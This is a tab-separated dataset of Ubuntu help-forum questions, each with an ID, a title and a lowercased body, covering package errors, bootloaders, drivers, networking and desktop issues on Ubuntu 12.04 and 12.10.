270846	can not install wine and playonlinux due to 404 errors ?	as the title says i am a ubuntu 12.04 user without any particular unix experience . i am a ( somewhat rusty ) fully qualified msce engineer who has made the mistake of switching to management : - ) . i have just istalled ubuntu 12.04 on my laptop and it works fine . i am now looking for ways of connecting to itunes , in order to access my account there . in other blogs and forums i read that i need to install playonlinux , which i have tried to do . however , although the internet connection is working fine for firefox , i get an error in ubuntu software centre . it says failed to download package files . the details reveal that : failed to fetch http : //nl.archive.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.6.3-2ubuntu2.3_i386.deb 404 not found failed to fetch http : //nl.archive.ubuntu.com/ubuntu/pool/main/s/samba/libpam-winbind_3.6.3-2ubuntu2.3_i386.deb 404 not found can anyone tell me where to find these .deb files ?
270848	where are drivers located for refind ?	i am planning to recompile my kernel with efi stub support , but currently my ubuntu installation 's partition is formatted with ext4fs . i have the refind ext4fs driver ( ext4_x86.efi ) in the refind-bin binary package i downloaded , but where should i put that ? i have installed refind from os x in my /efi/refind directory in mac os x ( i believe that is the main installation directory for refind , correct ? ) . there is no folder there called drivers_x86 . should i create the folder and copy the driver there ?
270851	how to monitor folders visited by a user ?	i 'm working on a project trying to auto-bookmark folders based on how frequently a folder/directory is visited . i have searched exhaustively as to how to monitor folders visited by the current user . can anyone guide me as to how to construct a script for doing the same ? language restrictions : c or java . maybe python .
270853	uninstall packages using dpkg	i want to uninstall openoffice package and want to do this using single command or regular expression i.e dpkg -r openoffice-org* but dpkg doesnot accept wild cards how can i uninstall all the packages using wildcard
270858	how to make app . icons stay on 12.10 launch bar	ubuntu 12.10 how do i make application icons stay on the launch bar ? some stay , but others i have always retrieve from dash
270861	attempted downgrade from grub2 to grub ; ca n't boot into ubuntu anymore	so i just did a clean install of windows 7 ultimate and installed ubuntu 12.10 beside it . i kept the windows bootloader in the mbr at the advice if my tutorial ( i used easybcd to enable an option for grub2 ) and installed grub2 to the /boot partition that i made for sda5 . if it matters , i set / as sda6 , /home as sda7 and swap as sda8 . i wanted to encrypt my windows partition with truecrypt , and i read to downgrade from grub2 to grub first , so i did ( or at least attempted to ) . the code i used to replace grub2 with grub came from post # 4 on this thread : http : //ubuntuforums.org/showthread.php ? t=1330347 # 4 however , it leads me into a command line titled `` gnu grub version 2.00-7ubuntu11 '' . i do n't know why it still says version 2 . anyways , i ca n't even boot into ubuntu now . from what i understand of grub ( a very limited understanding admittedly ) , i need to use the root , kernel , and boot command to boot up ubuntu . but the problem is that root and kernel do n't even exist as commands in the grub terminal . i pressed tab to list all the commands and they were n't among them . typing them into the terminal yields no result . how do i get into ubuntu now ?
270864	access denied for user 'tt-rss ' @ 'localhost ' after installing tt-rss	just installed tiny tiny rss . accessing http : //localhost/tt-rss from the browser brings me the following error : unable to connect to database ( as tt-rss to , database ttrss ) : access denied for user 'tt-rss ' @ 'localhost ' ( using password : yes ) how can i solve the problem ?
270885	error in package list does not allow software installation	just installed ubuntu 12.04 . it 's my first time and i cant seem to be able to install software available for download . when i use sudo apt-get update and sudo apt-get install on terminal , i get the following error mesage : reading package lists ... error ! e : encountered a section with no package : header e : problem with merge list /var/lib/apt/lists/cm.archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_translation-en e : the package lists or status file could not be parsed or opened .
270886	low-graphic mode changes ineffective	i 've done some searching , without luck . ( its hard when you do n't know what your question is and english is not your first language ) my ubuntu 12.10 is booting up in `` low-graphic mode '' all `` executable '' options leads to a flashing but unresponsive prompt ( scroll/num/caps-lock is dead ) pressing pwr-button will cause a `` normal '' system-reboot in most of these options . `` exit to console '' -will not . pwr-button for a `` hard '' restart . what is my options to get my system back ? ( reinstall is an option , just not something i want , even if i would like to install 12.04^^ ) ps . possible troublemakers could be my ... started setting up systemvpn , but did not complete config . ( `` novpn '' in yellow text when rebooting ) something went wrong when i installed/removed gnome3 my monitor is in fact eol ( takes some time for it to find its correct source , way past boot initz , x-configure is identifying it correctly thou )
270892	how do i change the backlight brightness on an imac 12,2 ?	problem : i ca n't adjust the brightness of my imac and it 's killing me . ( my eyes ! the goggles do nothing ! ) . has anyone gotten this to work ? -booting with refit 0.14 -product name : imac12,2 -kernel : 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 x86_64 x86_64 gnu/linux i 've tried this fix : https : //wiki.ubuntu.com/kernel/applegmuxbacklight but it does n't seem to work since the kernel module does n't seem to be loading . ( dmesg | grep gmux returns nothing ) i 've also tried doing this : xrandr -- output lvds -- brightness 0.3 and it dims the screen , but the mouse cursor still blazes away at full brightness . any thoughts ? thanks ! update : performing ls /sys/class/backlight/ returns acpi_video0 -the brightness slider in `` system settings '' has no effect . -the `` brightness '' function keys on my apple bluetooth keyboard do n't have any effect . thanks !
270897	lenvono y560 ( ati hd5730 ) can i hot switch discrete & integrated graphics card in ubuntu 12.10 ? tks	i have y560 laptop with ati hd5730 discrete card . echo off > /sys/kernel/debug/vgaswitcheroo/switch can power off discrete card . echo on > /sys/kernel/debug/vgaswitcheroo/switch can enable it . but echo dis > /sys/kernel/debug/vgaswitcheroo/switch can not use discrete graphics card , it always uses integrated card , unless in bios i cancel card switch and use discrete model . but can it be hot switched in ubuntu between discrete and integrated cards , like windows 7 ? and in the below command output : igd : + , dis-audio : + what does `` + '' mean there ? cat /sys/kernel/debug/vgaswitcheroo/switch 0 : igd : + : pwr:0000:00:02.0 1 : dis : : off:0000:01:00.0 2 : dis-audio : + : off:0000:01:00.1
270901	ubuntu server 12.04.2 - wireless connections	i have used ubuntu desktop for a while and i 'm now trying to set up a server . i 'm using a wireless pci adapter which works fine with ubuntu live cd . on installing the server it found the adapter and ( once i had entered the ssid and wpa key ) connected to the network almost immediately . however , after installation on booting for the first time it failed to connect during startup . at this point i 'm not sure quite where to go from here . i 've read the server guide but there is nothing about wireless networking in the networking chapter . i 'm used to the desktop gui so the commandline interface is a bit daunting . please be gentle ... just for the record the wireless adapter is a tp-link tl-wn781nd looks like i ran foul of the editting time limit and lack of formatting . trying again ... . my interfaces file looks much simpler - auto lo iface lo inet loopback auto wlan0 iface wlan0 inet dhcp wpa-ssid runnymededata wpa-psk the system wo n't start the network connection on bootup however it starts almost immediately i set the ssid explicitly on logging in . i do n't have to do anything else . the ip address is correctly assigned by the dhcp server ( my router ) and the machine then shows in the router 's list of connnections . i 'll give the static route a try and see how we get on . back soon . this problem has to do with the fact that the ssid is hidden on my wireless network . in my view this is a bug . with ssid hidden : system takes a log time to boot ( waiting unsuccesfully for network to start ) . once i have logged in then explicitly setting essid with iwconfig enables networking within a few seconds ; nothing else needs to be done . with ssid not hidden : system boots up quickly and networking is immediately up and running . in summary , nothing to do with the specific adapter and nothing to do with the interfaces file . thanks to @ chilli555 for taking the time to help .
270902	how will app permissions be handled in ubuntu touch ?	most elements of the hardware , or data sets shared between apps on the android and ios platform are controlled strongly , and only provided to apps explicitly on a need-to-know basis . this can allow the user to make sure , for example , a malicious flashlight app is n't uploading their location and contacts list . on the desktop on ubuntu , there are effectively two permission levels of control : user , and root . in the case of user , not much restriction is afforded . it can still connect to the internet , interface with most any hardware it likes , and read/write any files in /home/user/ . this model assumes that the user is competent enough to ensure an application they are using is legitimate ( which is very easy with open-source software ) . so my question is , what sort of restrictions and control over an app 's abilities will be in place on the mobile platform ? and since it 's all the same os , how will that system overflow into the desktop ? will all programs need to be sandboxed ? i 'm quite keen to know the plan : ) ps . one thing i like about the way ios does it over android is that many permissions must be explicitly approved by the user when it runs for the first time . the result being , if you do n't want to tell the facebook app where you are , you can just disallow it , versus on android where you just have to uninstall the app and get over itâ˘ . the system i 'd like to see is it asking for permission with a `` just this once '' and an `` always '' option , when the app needs that permission to execute a command . want to find yourself on the map ? ask for location permission . just like the way some html5 apis are handled .
270905	having trouble with corrupted disk images when installing 12.04.2 via flash drive	i 'm trying to install ubuntu 12.04.2 desktop 64 bit on my laptop and i 'm having problems with corrupted disk images . i can boot to the flash drive but it hangs during the boot and wo n't continue . i 've also tried installing with wubi in windows but it also ends up with a corrupted image after extracting and wont install . info : machine : asus f50sv-x1 laptop ( intel core2 duo , 4 gb ddr2 800mhz ram , nvidia gt 120m vid card ) current os : windows 7 professional 64 bit using a 16 gb flash drive as the install drive i 've tried making the bootable drive with unetbootin as well as universal usb installer . i 've verified the md5 checksum of the iso before running unetbootin/uni usb installer . hard drive is fine . memtest came up clean . even checked the flash drive integrity and it was fine . i 'm at a loss for what else i can do .
270908	how to customize the ( phonetic-arabic ) keyboard layout ?	ui am a newcomer to the linux world . been using msoft for 20years or more . just moved to ubuntu since 3 weeks and i am really enjoying it . i am needing an phonetic keyboard for arabic similar to the one at www.arabic-keyboard.org this keyboard is not like the arabic keyboard available in ubuntu . it is a customized version . i would like to know if this is available , or how can i proceed to design one .
270909	can i re-install windows without affecting ubuntu ?	i installed ubuntu 12.04 using wubi . i still use windows 7 from time to time and now i think i have a virus on it ( system crash twice a day without a reason ) my question is , if i will re-install windows , will it remove my ubuntu installation as well ? is it possible at this point to remove windows completely and allocate the hard-drive space only for ubuntu ? thanks so much
270915	compiz place windows not working at login	i 'm trying to set up a dual kiosk with firefox and chrome in kiosk mode . running ubuntu 12.10 on an intel nuc i3 with dual hdmi out on hd4000 grahics . i have two 1080p displays on the hdmi outputs , works perfect . in ccsm , i have set up two rules , one for chrome to be placed at 0,0 . one other rule for firefox to be placed at 1920 , 0 . both rules work perfect , when i start chrome it 's displayed on the first display . when i start firefox it 's displayed on my second display . so , i set chrome and firefox in the 'startup applications ' , even with a x-gnome-startup-delay=10 so the network gets initializes meanwhile . the user is set to autologin , when firing up the system everything works , chrome start at 0,0 ( display 1 ) but firefox should be placed at 1920,0 ( second display ) . this does n't happen , firefox is opened on top of chrome . when i close firefox and then launch it again , ccsm gets it and places it on 1920,0 ( second display ) . problem : why it firefox placed right when i launch is , but not when it is automatically launched at startup / login ? also tried to to add compiz -- replace to the start-up applications , no result . anybody that can help me with this problem ?
270916	boot folder is full so can not install updates .	plenty of free disk space . how do i either free up space on boot or increase its size ? using release 12.10 ( quantal ) 64-bit kernel linux 3.5.0-26-generic . thanks , dave .
270923	install applications and services without dist-upgrade	i am using ubuntu 12.04 32bit . we know that you ca n't install all latest application in it . as an example you ca n't install unity > =6.0 generally , also python > =3.2.3 . for that we need to upgrade our distribution ( version ) . but 12.10 or 13.04 is not lts and 12.10 is not stable as 12.04 . is there anyway that i can install every latest application without upgrade my distribution ? if not , then why i ca n't do that ? thanks in advance .
270929	running multiple services on a home server	i have this old laptop , but the battery and power adapter are basically shot . works great as long as it´s not mobile . anyway it´s now going to be my home server . i´ve got xubuntu 12.04lts installed , but before i start configuring this thing any deeper i wanted to get some opinions from people more knowledgeable about this stuff than i . my main question is about running multiple services . i would like to use this as a nas , and minecraft server for sure . possibly lamp as well if i decide to put together a family home page etc . normally i would just chuck everything on a screen and call it a day , but with the minecraft server i will occasionally be having in-laws and friends connect from outside the lan , which obviously poses a concern for priv escalation and data integrity . in preparing to get all this running should i create a different user for each of these services with each user running it´s own screen ? should i use some level of emulation or service segregation like lxc ? or am i over complicating this ? from a firewall perspective i´m good . nat is setup correctly and will forward the traffic as expected . the server itself is whitelisted ( or will be ) . but from a linux perspective i´m still too green to know if i´ve covered my bases .
270932	dconf-editor , where has apps > indicators > sound gone	sound is no longer listed in my dconf-editor under apps > indicators > anyone know where to find it ?
270934	flash player does not work probably with arabic language	the flash plug-in version 11.2 which is the latest version does not support the arabic language . it shows the characters separated and oriented from left to right ; whereas it has to display them as joined characters and oriented right to left . adobe says that they will only provide a security update and nothing else , so that clear bug will be kept for firefox , opera and other browsers that depend on the standalone plug-in . google chrome display the language correctly because of it 's own built in plug-in .
270937	how to display kanji in non-x terminal ?	i have ubuntu 12.04 desktop installed , but disabled the start of x , because i do > 99 % of my work in a terminal . however , i have found out that the `` linux '' terminal is unable to display kanji . i have tried installing ttf-takao and ttf-takao-mincho , but my terminal wo n't display them . note : interestingly , when starting xterm on x , it does n't show them either , even though my locale is set to `` de_at.utf-8 '' . is there any way to display them in my terminal ? for clarification : the question was how to display them in a non-x terminal , not xterm . the note was just to give additional info
270939	reupload package to launchpad with orig.tar.gz changed	i uploaded a package geos-3.3.8.orig.tar.gz to launchpad with success , but the build failed because a mistake in the source code , then i have changed my geos-3.3.8.orig.tar.gz with the right code , and ran debuild -s again , but now i get an email with rejected warning because dsc file is not correct ( checksums have changed ) how can i reupload again the package ?
270943	how to recover files lost in xubuntu installation ?	after installing xubuntu 12.10 , i lost all my files , but i only wanted to delete all operative systems , not my files . how can i recover my files and folders ? is there a program i can use for this ?
270952	xrdp from windows 7	i installed xrdp on my new ubuntu server 12.xx i saw a video that talked about creating a .xsession because of the 3d and 2d desktop . but it did n't work . if i take the .xsession out it opens a empty desktop with no icons on it . this is the content of the .xsession file . gnome-session -- session=ubuntu-2d any suggestions ?
270953	removing a file extension upon copying	i have a question which is super simple , but i just ca n't wrap my head around it . regarding the following command line : for foo in *.dist ; do cp $ foo `basename $ foo .dist` ; done i know it takes all files in the current directory which have .dist as an extension , copies them and in the same step removes the .dist extension ( i have grapped it from a wiki post regarding the installation of otrs under ubuntu server ) . i just want to understand why it is doing this . thank you very much .
270956	firefox gtk-critical error	i am using ubuntu 12.10 and i usually start firefox by the command line and after an upgrade i noticed that i am getting these errors . i do n't see many posts about them from others , so i have very little to go by as far as to how to fix them . has anyone else seen this error , and if so what did you do to fix it ? gserver @ gserver : ~ $ firefox ( firefox:22346 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( firefox:22346 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( firefox:22346 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( firefox:22346 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( firefox:22346 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed ( firefox:22346 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( firefox:22346 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( firefox:22346 ) : gtk-critical ** : ia__gtk_icon_theme_prepend_search_path : assertion `gtk_is_icon_theme ( icon_theme ) ' failed ( firefox:22346 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( firefox:22346 ) : gtk-critical ** : ia__gtk_icon_theme_prepend_search_path : assertion `gtk_is_icon_theme ( icon_theme ) ' failed ( firefox:22346 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( firefox:22346 ) : gtk-critical ** : ia__gtk_icon_theme_prepend_search_path : assertion `gtk_is_icon_theme ( icon_theme ) ' failed how can i fix/adjust my gtk_settings ? tia matt
270957	how to restore files from unusable ubuntu ?	my ubuntu installation got messed up because of an upgrade ( on archive manager - which is definitely my fault ) . every time i boot my laptop , after logging in , its background is blue with plain and silver panels . too many errors shows up ( it always says i do n't have permission viewing its content ) . i have so many important files there i 'm wondering if its possible to remove the hdd and connect it in my windows pc ( to create copies ) . will it work , or will it just do what it does in my laptop ? or will it mess up my pc ?
270958	errors while compiling allegro library program on gcc	i 've tried installing allegro library on my system.i did n't get any error while installing the library , but it seems that something went wrong while installation . my code along with the errors i 'm getting while compiling the program : /* testprog.c */ # include < allegro.h > void init ( ) ; void deinit ( ) ; int main ( ) { init ( ) ; while ( ! key [ key_esc ] ) { /* put your code here */ } deinit ( ) ; return 0 ; } end_of_main ( ) void init ( ) { int depth , res ; allegro_init ( ) ; depth = desktop_color_depth ( ) ; if ( depth == 0 ) depth = 32 ; set_color_depth ( depth ) ; res = set_gfx_mode ( gfx_autodetect_windowed , 640 , 480 , 0 , 0 ) ; if ( res ! = 0 ) { allegro_message ( allegro_error ) ; exit ( -1 ) ; } install_timer ( ) ; install_keyboard ( ) ; install_mouse ( ) ; /* add other initializations here */ } void deinit ( ) { clear_keybuf ( ) ; /* add other deinitializations here */ } errors i 'm getting : $ gcc testprog.c -o testprog `allegro-config -- cflags -- libs` testprog.c : in function âinitâ : testprog.c:26:1 : warning : format not a string literal and no format arguments [ -wformat-security ] /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/crt1.o : in function `_start ' : ( .text+0x20 ) : undefined reference to `main' collect2 : error : ld returned 1 exit status $ i 've followed instructions given on these links for installing the library and compiling my program : instructions for installing allegro on ubuntu instructions for compiling programs written in allegro
270962	download/save persona files	i love the new features of libreoffice 4 , especially the ability to have a persona installed on it . my favorite is this one . anyways , i have a midline internet connection , and i was wondering if there was a way i could download and save the image for the persona somewhere where libreoffice does n't have to download it every time .
270972	extra characters showing up when i type	i am using 12.04 lts and ext+r9a char9act+er9s ar9e showing uap when i t+yape . also a lar9ge black r9ect+angle wit+h a cir9cle and bar9 symbol keeaps showing uap . i am concer9ned t+his may be associat+ed wit+h an at+t+emapt+ t+o hack me ( unusual act+ivit+y on a websit+e . any ideas ?
270973	ubuntu taskbar disappears after reboot , unity-reset shows a warning after running	this is the code for what happened after ioperated the unity -- reset command . the taskbar showed up but so does all these errors and warnings . unity-panel-service : no process found checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x1600004 compiz ( core ) - warn : failed to receive configurenotify event on 0x26000ac initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:1992 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed initializing unityshell options ... done compiz ( core ) - warn : unhandled configurenotify on 0xc0009e ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000a1 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . warn 2013-03-21 12:32:11 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-writer.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-03-21 12:32:11 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-calc.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-03-21 12:32:11 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-impress.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-03-21 12:32:11 unity < unknown > :0 failed to fetch type : no such interface `org.ayatana.bamf.window ' on object at path /org/ayatana/bamf/window39846060 initializing staticswitcher options ... done error 2013-03-21 12:32:12 unity.glib-gobject < unknown > :0 g_object_unref : assertion `g_is_object ( object ) ' failed setting update `` main_menu_key '' setting update `` run_key '' warn 2013-03-21 12:33:04 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application0x1361000 warn 2013-03-21 12:33:04 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application0x1361000 error 2013-03-21 12:33:06 unity.glib-gobject < unknown > :0 g_object_set_qdata : assertion `g_is_object ( object ) ' failed warn 2013-03-21 12:33:10 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application0x12e0000 error 2013-03-21 12:33:12 unity.glib-gobject < unknown > :0 g_object_set_qdata : assertion `g_is_object ( object ) ' failed warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch xid : no such interface `org.ayatana.bamf.window ' on object at path /org/ayatana/bamf/window62914660 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch monitor : no such interface `org.ayatana.bamf.window ' on object at path /org/ayatana/bamf/window62914660 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch maximized state : no such interface `org.ayatana.bamf.window ' on object at path /org/ayatana/bamf/window62914660 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch xid : no such interface `org.ayatana.bamf.window ' on object at path /org/ayatana/bamf/window62914660 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch xid : no such interface `org.ayatana.bamf.window ' on object at path /org/ayatana/bamf/window62914660 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch type : no such interface `org.ayatana.bamf.window ' on object at path /org/ayatana/bamf/window62914660 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch path : no such interface `org.ayatana.bamf.application ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch icon : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch name : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch boolean : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch path : no such interface `org.ayatana.bamf.application ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch path : no such interface `org.ayatana.bamf.application ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch path : no such interface `org.ayatana.bamf.application ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch xid : no such interface `org.ayatana.bamf.window ' on object at path /org/ayatana/bamf/window62914660 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch xid : no such interface `org.ayatana.bamf.window ' on object at path /org/ayatana/bamf/window62914660 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch name : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch icon : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 failed to fetch path : no such interface `org.ayatana.bamf.application ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 warn 2013-03-21 12:33:16 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application746707297 error 2013-03-21 12:33:17 unity < unknown > :0 bamf_view_get_children : assertion `bamf_is_view ( view ) ' failed error 2013-03-21 12:33:18 unity.glib-gobject < unknown > :0 g_object_set_qdata : assertion `g_is_object ( object ) ' failed note : child process received `goodbye ' , closing down
270978	how to use vpn over manually set up network bridge ( with the primary interface unmanaged by networkmanager ) ?	i 've set up a network bridge which i 'm using to connect kvm virtual machines on my desktop to my home network ; i ' ve don this the manual way by creating the bridge in /etc/network/interfaces ( the way it 's done by the book for best networking performance , and we 're using on our company virtualisation servers ) . this , however , means that networkmanager is n't managing the eth0 interface any more , and is refusing to set up vpn connections . that would n't have bothered me so much if i could find an app to connect with instead of nm . but , alas , i could n't find anything ! there was some package called kvpnc , described as a gui for vpn clients , but it kept crashing . as far as i could see , there was n't any alternative working vpn gui . other people are having similar problems : network bridge - without destroying network manager but that guy just ended up going back to nm and setting up routing instead of a bridge instead of finding an alternative vpn client . any ideas ? edit : forgot to mention that i 'm using pptp at the moment and might need openvpn in the future .
270980	when compiling the linux kernel , what is the purpose of `make randconfig` ?	in what scenario would one want to use this tool ? it would seem to make less work , but the upshot is , of course , that you do n't know what configuration options will be used for your kernel , which could very well mess things up .
270985	why am i prompted to accept a microsoft eula when i run apt-get install ?	whenever i use sudo apt-get install packagename , it will start installing . i will type `` y '' when prompted then this will pop up : truetype core fonts for the web eula end-user license agreement for microsoft software âś < ok > why does this happen ?
270993	fast , lightweight alternative to compiz ' expo plugin ?	are there any fast , lightweight alternatives to compiz ' expo plugin ( which are compatible with / capable of running alongside unity & compiz ) in standard ubuntu ? i 'm looking for sth that 's almost 1:1 like expo is today , in particular the alternative should feature an overview of ( four ) workspaces , with a resolution comparable to expo's no animations drag-and-drop of windows across workspaces , on the other hand , is not necessary . only if the additional resource/cpu-demand thus incurred would be negligible even on older systems , this feature would be nice to have ; otherwise not . likewise , it would be nice , but again not necessary , if the unity launcher could be shown ( hides on my system , when not in use ) in that alternative 's `` expo view '' . ps : does lubuntu have an equivalent to expo ? what is it ? pps : rumour has it that compiz has more or less been abandoned ... : (
270995	stitching a photo below a batch of photos	i am sure there would be a simple command for this however i have not been able to find one . basically i would like to stitch a photo below another photo with no overlap . also ideally i would like a command that can automate this process for 200 top images where the same bottom image is stitched . all images have the same width so no transformation is required . i am looking for a program something like `` stitch -below top.png bottom.png '' , i have explored options like montage but can not seem to get it to work as required . looking for advise .
270997	unable to mount volume - operation not supported	i 've just installed ubuntu to my usb drive and the gui comes up beautifully . but if i click on any of my devices i get the error : unable to mount xxxx volume adding read acl for uid 999 to '/media/unbuntu ' failed : operation not supported
271000	how do i remove windows 8 from a ubuntu 12.10 wubi install ?	i have used windows all my life , but now i have installed ubuntu 12.10 wubi . i 'm absolutely new to linux , and although ubuntu is installed as dual boot along with windows 8 , i only want to use ubuntu . how do i remove windows 8 from my laptop ?
271001	xubuntu : unable to bind arbitrary shortcut keys	i used to be able to bind any arbitrary shortcut key to launching external applications ; in particular , i used to bind ctrl+shift+hjkl to a small utility which moves the mouse cursor around . however , a while back , this stopped working , as now it only seems to allow binding shortcut keys to a single modifier at a time ; pressing ctrl+shift+j binds the action to ctrl+j , for example . if i manually edit my key bindings in the associated config file , the bindings simply do not work . the one exception to the single-modifier shortcuts seems to be that you can bind ctrl+super+ ( anything ) to a separate shortcut ; however , the purpose of this configuration is to improve my workstation ergonomics , and ctrl+super+hjkl are somewhat more cumbersome to press . short of completely switching window managers , is there some way to get xfwm to recognize keyboard shortcuts formed from ctrl+shift ?
271008	indicator-messages empathy status not working	i installed pidgin and uninstalled it shortly after . after that , the buttons available away busy invisible offline do n't work anymore . whichever i press , the dot that indicates the current state stays on offline and does n't do anything to the empathy messenger . how can i reset/reinstall telepathy/indicator to make it work again ?
271010	ati catalyst 13.1 driver on 12.04 lts w/ 3.5.0-25 kernel	i followed this hotto and changed the package to the newest one amd offers . it all loaded correctly , but in the end the driver would n't run . i see others have success , but as i looked through the comments , i see that someone with an os and kernel similar to mine could n't get it working either . is this a problem with the kernel and porting support , or should i look for something else ?
